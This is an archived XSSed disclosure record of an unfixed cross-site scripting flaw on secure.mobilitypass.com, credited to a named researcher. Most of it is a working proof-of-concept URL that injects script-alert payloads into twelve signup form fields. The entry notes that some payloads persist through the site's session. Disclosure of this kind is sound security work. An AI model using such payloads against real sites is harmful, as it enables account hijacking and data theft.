Unfixed XSS vulnerability at secure.mobilitypass.com

2009-08-28T00:00:00
ID XSSED:63851
Type xssed
Reporter Jelmer de Hen
Modified 2010-05-24T00:00:00

Description

Security researcher Jelmer de Hen, has submitted on 28/08/2009 a cross-site-scripting (XSS) vulnerability affecting secure.mobilitypass.com, which at the time of submission ranked 729724 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: https://secure.mobilitypass.com/SignupForm?login="<script>alert(1)</script>&pass="<script>alert(2)</script>&voucher="<script>alert(3)</script>&fname="<script>alert(4)</script>&lname="<script>alert(5)</script>&email="<script>alert(6)</script>&email2="<script>alert(7)</script>&address="<script>alert(8)</script>&city="<script>alert(9)</script>&state="<script>alert(10)</script>&zip="<script>alert(11)</script>&mphone="<script>alert(12)</script>#The_site_will_store_some_variables_in_a_session_and_reuse_it_all_over_the_site_this_makes_it_that_some_of_the_xsses_will_trigger_again_after_revisiting_the_page